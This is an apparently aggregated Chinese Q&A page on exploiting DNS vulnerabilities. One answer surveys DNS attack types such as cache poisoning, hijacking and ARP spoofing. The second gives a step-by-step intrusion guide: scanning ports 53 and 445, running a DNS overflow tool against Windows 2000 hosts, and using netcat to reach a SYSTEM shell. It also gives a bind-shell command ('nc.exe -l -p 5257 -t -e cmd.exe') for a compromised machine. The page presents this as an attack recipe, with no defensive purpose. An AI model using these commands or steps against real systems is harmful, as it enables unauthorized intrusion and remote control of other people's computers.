如何利用dns漏洞入侵
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何利用dns漏洞入侵相关的知识,希望对你有一定的参考价值。
dns攻击主要有以下这几种方式:DNS缓存感染
攻击者使用DNS请求,将数据放入一个具有漏洞的的DNS服务器的缓存当中。这些缓存信息会在客户进行DNS访问时返回给用户,从而把用户客户对正
常域名的访问引导到入侵者所设置挂马、钓鱼等页面上,或者通过伪造的邮件和其他的server服务获取用户口令信息,导致客户遭遇进一步的侵害。
DNS信息劫持
TCP/IP体系通过序列号等多种方式避免仿冒数据的插入,但入侵者如果通过监听客户端和DNS服务器的对话,就可以猜测服务器响应给客户端的
DNS查询ID。每个DNS报文包括一个相关联的16位ID号,DNS服务器根据这个ID号获取请求源位置。攻击者在DNS服务器之前将虚假的响应交给用
户,从而欺骗客户端去访问恶意的网站。假设当提交给某个域名服务器的域名解析请求的DNS报文包数据被截获,然后按截获者的意图将一个虚假的IP地址作为
应答信息返回给请求者。原始请求者就会把这个虚假的IP地址作为它所要请求的域名而进行访问,这样他就被欺骗到了别处而无妨连接想要访问的那个域名。
DNS重定向
攻击者将DNS名称查询重定向到恶意DNS服务器上,被劫持域名的解析就完全在攻击者的控制之下。
ARP欺骗
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的
ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。ARP攻击主要是存在于局域网网络中,局域网中若有一台计算机
感染ARP病毒,则感染该ARP病毒的系统将会试图通过”ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
ARP欺骗通常是在用户局网中,造成用户访问域名的错误指向。如果IDC机房也被ARP病毒入侵后,则也可能出现攻击者采用ARP包压制正常主机、或者压制DNS服务器,以使访问导向错误指向的情况。
本机劫持
本机的计算机系统被木马或流氓软件感染后,也可能会出现部分域名的访问异常。如访问挂马或者钓鱼站点、无法访问等情况。本机DNS劫持方式包括hosts文件篡改、本机DNS劫持、SPI链注入、BHO插件等方式。
群英服务器小静,希望以上答案能帮助到你 参考技术A 前提是必须要开放53、445端口 1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描。
2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,“1028 :Vulnerability”表示
1028端口存在溢出漏洞,“os:window 2000”表示系统类型为window 2000。
3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。connection to target host tcp port established 成功连接到主机的tcp端口上,
successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000
系统指纹鉴定对方是wind2000系统,attack sent,check port 1100 攻击代码已经成功发送,并尝试连接1100端口。当出现最后这一句
提示语句的时候就意味着我们要成功了。
4、怎么连接对方的1100端口呢,当然我们要使用nc了。
5、nc全称叫"netcat",这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的“瑞士军刀”。下面介绍一下它的几个常用功能
1、nc.exe -vv -l -p 6069,表示在本地6069端口上进行监听。-vv:显示详细的信息。-l:进行监听,监听入站信息。-p:监听所使用的
端口号。
2、正如我们遇到的情况,对方已经开放了一个端口。他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了。
nc.exe -vv 127.0.0.1 5257,连接ip为127.0.0.1的5257端口。
3、还可以在本地监听端口的同时绑定shell,就相当于一个telnet服务端。通常这个命令在肉鸡上执行,然后当我们连接上去就可以获得
这个shell了。nc.exe -l -p 5257 -t -e cmd.exe,在本机5257端口上监听并绑定cmd.exe。-e 作用就是程序定向。-t以telnet的形式
来应答。
4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe -vv 127.0.0.1 80 <yan.txt,往ip为127.0.0.1的80端口提交yan.txt中
的内容。
6、介绍完nc.exe的四种常用方式,现在知道如何使用nc来链接对方的1100端口了吧,我们使用nc -vv 127.0.0.1 1100 连接对方的1100端口,
成功获得了一个具有system权限的cmdshell,现在想干什么就干什么了。
以上是关于如何利用dns漏洞入侵的主要内容,如果未能解决你的问题,请参考以下文章